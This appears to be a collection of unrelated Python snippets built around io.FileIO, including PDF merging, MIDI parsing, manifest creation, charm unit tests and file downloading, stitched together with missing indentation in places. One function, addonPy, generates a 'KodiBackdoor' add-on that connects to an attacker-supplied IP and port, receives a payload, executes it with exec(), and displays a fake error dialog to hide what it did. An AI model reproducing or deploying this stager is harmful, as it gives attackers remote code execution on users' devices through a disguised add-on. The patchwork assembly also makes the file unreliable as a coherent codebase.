def replace(self, attachable: Union[io.BytesIO, io.FileIO], position=None, **kwargs):
    """
    .. versionadded:: 0.5

    Replace the underlying file-object with a seekable one.

    :param attachable: A seekable file-object.
    :param position: Position to seek to on the new file-object. If :data:`None`, the
                     current position is preserved.
    :param kwargs: Keyword arguments, the same as accepted by :class:`.BaseDescriptor`.
    """
    if position is None:
        position = self.tell()
    # Close the old file-like object and attach the new one.
    self.close()
    self._file = attachable
    # Re-run the base initializer so the descriptor state matches the new file-object.
    super().__init__(**kwargs)
    self.seek(position)
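# Usage sketch for replace() above. `descriptor` is a hypothetical instance of a
# class deriving from BaseDescriptor; only the call pattern is illustrated here.
#
#     new_content = io.BytesIO(b'replacement payload')
#     descriptor.replace(new_content)              # keep the current position
#     descriptor.replace(new_content, position=0)  # or rewind explicitly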
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
"""
Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate
all pages onto the end of the file instead of specifying a position.
:param fileobj: A File Object or an object that supports the standard read
and seek methods similar to a File Object. Could also be a
string representing a path to a PDF file.
:param str bookmark: Optionally, you may specify a bookmark to be applied at
the beginning of the included file by supplying the text of the bookmark.
:param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple
to merge only the specified range of pages from the source
document into the output document.
:param bool import_bookmarks: You may prevent the source document's bookmarks
from being imported by specifying this as ``False``.
"""
self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
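# Usage sketch for append() above, assuming these methods belong to a
# PdfFileMerger-style class from the legacy PyPDF2 API; the input and output
# file names are placeholders.
#
#     from PyPDF2 import PdfFileMerger
#     merger = PdfFileMerger()
#     merger.append('intro.pdf', bookmark='Introduction')
#     merger.append('body.pdf', pages=(0, 10), import_bookmarks=False)
#     with open('combined.pdf', 'wb') as out:
#         merger.write(out)
#     merger.close()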
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
chunk_type = data.read(4)
if chunk_type != b'MThd':
raise ValueError("File had invalid header chunk type")
header_length = int.from_bytes(data.read(4), 'big')
if header_length != 6:
raise ValueError("File has unsupported header length")
self.length = header_length
format = int.from_bytes(data.read(2), 'big')
if format not in [0, 1, 2]:
raise ValueError("File has unsupported format")
self.format = format
ntrks = int.from_bytes(data.read(2), 'big')
    if ntrks > 1 and format == 0:
        # A format-0 file must contain exactly one track chunk.
        raise ValueError("Multiple tracks in single track format")
self.ntrks = ntrks
self.tpqn = int.from_bytes(data.read(2), 'big')
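# Self-contained sanity check of the MThd layout parsed by __init__ above (the
# enclosing class is not shown here, so only the raw byte layout is exercised;
# io.BytesIO duck-types the read() interface the parser relies on).
def _mthd_layout_example():
    import io
    header = (b'MThd'
              + (6).to_bytes(4, 'big')      # header length
              + (1).to_bytes(2, 'big')      # format 1
              + (2).to_bytes(2, 'big')      # two tracks
              + (480).to_bytes(2, 'big'))   # 480 ticks per quarter note
    data = io.BytesIO(header)
    assert data.read(4) == b'MThd'
    assert int.from_bytes(data.read(4), 'big') == 6
    assert int.from_bytes(data.read(2), 'big') == 1
    assert int.from_bytes(data.read(2), 'big') == 2
    assert int.from_bytes(data.read(2), 'big') == 480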
def addonPy(ip, port):
with io.FileIO("KodiBackdoor/addon.py", "w") as file:
file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')
#Zip folder
def download(user, file, msg):
def startdownload(_request):
downloader = MediaIoBaseDownload(fh, _request)
done = False
while not done:
status, done = downloader.next_chunk()
try:
msg.edit(user.getstr('drive_downloading_progress')
.format(p=int(status.progress() * 100)))
except botogram.api.APIError:
pass
os.chdir('/tmp') # Sorry Windows users
fh = io.FileIO(file.get('name'), 'wb')
service = login(user)
try:
request = service.files().get_media(fileId=file.get('id'))
startdownload(request)
return '/tmp/' + file.get('name')
    except Exception:
        # Direct download failed (e.g. a Google-native document); export it as a PDF instead.
        request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
startdownload(request)
os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf')
return '/tmp/' + file.get('name') + '.pdf'
def valid_io_modes(self, *a, **kw):
modes = set()
t = LocalTarget(is_tmp=True)
t.open('w').close()
for mode in self.theoretical_io_modes(*a, **kw):
try:
io.FileIO(t.path, mode).close()
except ValueError:
pass
except IOError as err:
if err.errno == EEXIST:
modes.add(mode)
else:
raise
else:
modes.add(mode)
return modes
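# Companion sketch for valid_io_modes() above, showing the two failure modes it
# filters on: io.FileIO rejects unknown mode strings with ValueError, and mode 'x'
# fails with EEXIST once the target file already exists. The probe path is created
# on the fly and is purely illustrative.
def _fileio_mode_example():
    import io
    import os
    import tempfile
    path = os.path.join(tempfile.mkdtemp(), 'probe')
    open(path, 'w').close()
    try:
        io.FileIO(path, 'q')                 # unsupported mode string
    except ValueError as exc:
        print('rejected:', exc)
    try:
        io.FileIO(path, 'x')                 # exclusive-create on an existing file
    except FileExistsError as exc:           # OSError subclass with errno == EEXIST
        print('already exists, errno:', exc.errno)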
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
for file_path in tqdm(wav_files, total=len(wav_files)):
file_paths.append(file_path.strip())
print('\n')
if ordered:
_order_files(file_paths)
with io.FileIO(manifest_path, "w") as file:
for wav_path in tqdm(file_paths, total=len(file_paths)):
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
print('\n')
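# Example invocation of create_manifest() above; the dataset root is a placeholder
# and the usual layout of parallel .../wav/*.wav and .../txt/*.txt files is assumed.
#
#     create_manifest('/data/an4_dataset/train', tag='an4_train', ordered=True)
#     # -> writes an4_train_manifest.csv with "<wav path>,<transcript path>" rows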
def _pipe_stdin(self, stdin):
if stdin is None or isinstance(stdin, io.FileIO):
return None
tsi = self._temp_stdin
bufsize = self.bufsize
if isinstance(stdin, io.BufferedIOBase):
buf = stdin.read(bufsize)
while len(buf) != 0:
tsi.write(buf)
tsi.flush()
buf = stdin.read(bufsize)
elif isinstance(stdin, (str, bytes)):
raw = stdin.encode() if isinstance(stdin, str) else stdin
for i in range((len(raw)//bufsize) + 1):
tsi.write(raw[i*bufsize:(i + 1)*bufsize])
tsi.flush()
else:
raise ValueError('stdin not understood {0!r}'.format(stdin))
def load(self, file: FileIO):
    self.ptr = file.tell()
    self.is_leaf, self.keys = load(file)
    ptr_num = len(self.keys)
    if not self.is_leaf:
        # An internal node with k keys stores k value pointers plus k + 1 child pointers.
        ptr_num += (ptr_num + 1)
    ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num))
    if self.is_leaf:
        self.ptrs_value = list(ptrs)
    else:
        # The first ptr_num pointers reference values; the remaining ptr_num + 1 reference children.
        ptr_num //= 2
        self.ptrs_value = list(ptrs[:ptr_num])
        self.ptrs_child = list(ptrs[ptr_num:])
    self.size = file.tell() - self.ptr
def test_create(self, mock_open):
"""Test create sysctl method"""
_file = MagicMock(spec=io.FileIO)
mock_open.return_value = _file
create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf")
_file.__enter__().write.assert_called_with("kernel.max_pid=1337\n")
self.log.assert_called_with(
"Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
" values: {'kernel.max_pid': 1337}",
level='DEBUG')
self.check_call.assert_called_with([
"sysctl", "-p",
"/etc/sysctl.d/test-sysctl.conf"])
def test_configure_install_source_distro_proposed(
self, _spcc, _open, _lsb):
"""Test configuring installation source from deb repo url"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
openstack.configure_installation_source('distro-proposed')
_file.__enter__().write.assert_called_once_with(
'# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
'precise-proposed main universe multiverse restricted\n')
src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
'restricted main multiverse universe')
openstack.configure_installation_source(src)
_spcc.assert_called_once_with(
['add-apt-repository', '--yes',
'deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
'restricted main multiverse universe'])
def test_configure_install_source_uca_repos(
self, _fip, _lsb, _install, _open):
"""Test configuring installation source from UCA sources"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_fip.side_effect = lambda x: x
for src, url in UCA_SOURCES:
actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
openstack.configure_installation_source(src)
_install.assert_called_with(['ubuntu-cloud-keyring'],
fatal=True)
_open.assert_called_with(
'/etc/apt/sources.list.d/cloud-archive.list',
'w'
)
_file.__enter__().write.assert_called_with(actual_url)
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
"""Test generation of scriptrc from environment"""
scriptrc = ['#!/bin/bash\n',
'export setting1=foo\n',
'export setting2=bar\n']
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
_exists.return_value = False
os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'
openstack.save_script_rc(setting1='foo', setting2='bar')
rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
_mkdir.assert_called_with(rcdir)
expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
_open.assert_called_with(expected_f, 'wt')
_mkdir.assert_called_with(os.path.dirname(expected_f))
_file.__enter__().write.assert_has_calls(
list(call(line) for line in scriptrc), any_order=True)
def test_configure_install_source_uca_repos(
self, _fip, _lsb, _install, _open):
"""Test configuring installation source from UCA sources"""
_lsb.return_value = FAKE_RELEASE
_file = MagicMock(spec=io.FileIO)
_open.return_value = _file
_fip.side_effect = lambda x: x
for src, url in UCA_SOURCES:
actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
fetch.add_source(src)
_install.assert_called_with(['ubuntu-cloud-keyring'],
fatal=True)
_open.assert_called_with(
'/etc/apt/sources.list.d/cloud-archive.list',
'w'
)
_file.__enter__().write.assert_called_with(actual_url)
def create_manifest(data_path, tag, ordered=True):
manifest_path = '%s_manifest.csv' % tag
file_paths = []
wav_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(data_path)
for f in fnmatch.filter(files, '*.wav')]
size = len(wav_files)
counter = 0
for file_path in wav_files:
file_paths.append(file_path.strip())
counter += 1
update_progress(counter / float(size))
print('\n')
if ordered:
_order_files(file_paths)
counter = 0
with io.FileIO(manifest_path, "w") as file:
for wav_path in file_paths:
transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
file.write(sample.encode('utf-8'))
counter += 1
update_progress(counter / float(size))
print('\n')
def __init__(self, **kwargs):
buf = FileIO(sys.stdout.fileno(), 'w')
super(_Py3Utf8Stdout, self).__init__(
buf,
encoding='utf8',
errors='strict'
)
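# The snippet above shows only __init__; below is a minimal self-contained sketch of
# the same idea. That the class derives from io.TextIOWrapper is an assumption made
# for this sketch and is not shown in the original. Note that closing the wrapper
# also closes the underlying stdout descriptor, mirroring the snippet above.
import io
import sys

class _Py3Utf8StdoutSketch(io.TextIOWrapper):
    """Force UTF-8 stdout on Python 3 regardless of the configured locale."""

    def __init__(self, **kwargs):
        buf = io.FileIO(sys.stdout.fileno(), 'w')
        super().__init__(buf, encoding='utf8', errors='strict')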
def download(url, file_name):
    """
    Download a file over HTTP.

    url       : URL of the file to download
    file_name : local file name to write to
    """
    with io.FileIO(file_name, "w") as file:
        # issue the GET request
        response = get(url)
        # write the response body to the file
        file.write(response.content)
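# Usage sketch for download() above. It assumes `get` is requests.get imported at
# module level in the original file (an assumption); the URL and file name are
# placeholders. For large downloads, requests' streaming mode (stream=True with
# iter_content()) would avoid holding the whole body in memory.
#
#     download('https://example.com/data/archive.zip', 'archive.zip')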
def isfileobj(f):
return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
def get_data(self, path):
"""Return the data from path as raw bytes."""
with io.FileIO(path, 'r') as file:
return file.read()
# inspired from importlib2
def write(self, fileobj):
"""
Writes all data that has been merged to the given output file.
:param fileobj: Output file. Can be a filename or any kind of
file-like object.
"""
    my_file = False
    if isString(fileobj):
        # A path string was passed in; open it ourselves (Python 3: open(), not the removed file() builtin).
        fileobj = open(fileobj, 'wb')
        my_file = True
# Add pages to the PdfFileWriter
# The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13
for page in self.pages:
self.output.addPage(page.pagedata)
page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())
#idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1
#page.out_pagedata = IndirectObject(idnum, 0, self.output)
# Once all pages are added, create bookmarks to point at those pages
self._write_dests()
self._write_bookmarks()
# Write the output to the file
self.output.write(fileobj)
if my_file:
fileobj.close()
def close(self):
    """
    Closes all file descriptors (input and output) and clears all memory
    usage.
    """
self.pages = []
for fo, pdfr, mine in self.inputs:
if mine:
fo.close()
self.inputs = []
self.output = None
def addBookmark(self, title, pagenum, parent=None):
"""
Add a bookmark to this PDF file.
:param str title: Title to use for this bookmark.
:param int pagenum: Page number this bookmark will point to.
:param parent: A reference to a parent bookmark to create nested
bookmarks.
"""
    if parent is None:
iloc = [len(self.bookmarks)-1]
elif isinstance(parent, list):
iloc = parent
else:
iloc = self.findBookmark(parent)
dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))
    if parent is None:
self.bookmarks.append(dest)
else:
bmparent = self.bookmarks
for i in iloc[:-1]:
bmparent = bmparent[i]
npos = iloc[-1]+1
if npos < len(bmparent) and isinstance(bmparent[npos], list):
bmparent[npos].append(dest)
else:
bmparent.insert(npos, [dest])
return dest
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
logfileLock = threading.Lock() # we need a mutex so the logfile line buffer doesn't get messed up
stderrThread = None
if logfile:
# use a thread to print stderr output and write it to logfile (not using a thread would block)
stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
stderrThread.start()
for line in proc.stdout:
with logfileLock: # make sure we don't interleave stdout and stderr lines
if logfile:
logfile.write(line)
if stdoutFilter:
stdoutFilter(line)
else:
sys.stdout.buffer.write(line)
flushStdio(sys.stdout)
retcode = proc.wait()
if stderrThread:
stderrThread.join()
    # Not sure if the remaining call is needed
    remainingOut, remainingErr = proc.communicate()  # communicate() returns (stdout, stderr)
if remainingErr:
print("Process had remaining stderr:", remainingErr)
sys.stderr.buffer.write(remainingErr)
if logfile:
logfile.write(remainingOut)
if remainingOut:
print("Process had remaining stdout:", remainingOut)
sys.stdout.buffer.write(remainingOut)
if logfile:
logfile.write(remainingErr)
if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
# add the final new line after the filtering
sys.stdout.buffer.write(b"\n")
if retcode:
message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
if logfile:
message += "See " + logfile.name + " for details."
raise SystemExit(message)
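# Sketch of a stdoutFilter callable compatible with the loop above: it receives raw
# stdout lines as bytes and decides what to echo to the console. The name and the
# filtering rule are illustrative only and not part of the original build tool.
def _quiet_stdout_filter(line: bytes) -> None:
    import sys
    # Echo only lines that look like warnings or errors; everything else stays in the logfile.
    if b'warning' in line.lower() or b'error' in line.lower():
        sys.stdout.buffer.write(line)
        sys.stdout.buffer.flush()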
@contextmanager
def patch_open():
'''Patch open() to allow mocking both open() itself and the file that is
yielded.
Yields the mock for "open" and "file", respectively.'''
mock_open = MagicMock(spec='builtins.open')
mock_file = MagicMock(spec=io.FileIO)
@contextmanager
def stub_open(*args, **kwargs):
mock_open(*args, **kwargs)
yield mock_file
with patch('builtins.open', stub_open):
yield mock_open, mock_file
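# Usage sketch for patch_open() above inside a test body; `code_under_test`, the
# path and the written content are all placeholders.
#
#     with patch_open() as (mock_open, mock_file):
#         code_under_test()
#         mock_open.assert_called_once_with('/etc/example.conf', 'w')
#         mock_file.write.assert_called_once_with('contents\n')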
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
length_bytes = bytearray(data.read(4))
length = int.from_bytes(length_bytes, "big")
if length != 2:
raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
sequence_num_raw = bytearray(data.read(2))
sequence_num = int.from_bytes(sequence_num_raw, "big")
return length, sequence_num, sequence_num_raw
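# Self-contained check of sequence_number() above: a well-formed Sequence Number
# meta event payload is a 4-byte big-endian length of 2 followed by the 16-bit
# number itself (io.BytesIO duck-types the read() interface the parser uses).
def _sequence_number_example():
    import io
    payload = (2).to_bytes(4, 'big') + (42).to_bytes(2, 'big')
    length, value, raw = sequence_number(io.BytesIO(payload))
    assert (length, value) == (2, 42)
    assert raw == bytearray(b'\x00\x2a')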
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in text event") from exc
return length, text, raw_data
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in copyright notice") from exc
return length, text, raw_data
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
length = VariableLengthValue(data).value
raw_data = bytearray(data.read(length))
try:
text = raw_data.decode("ASCII")
except UnicodeDecodeError as exc:
raise EventTextError("Unparsable text in track/sequence name") from exc
return length, text, raw_data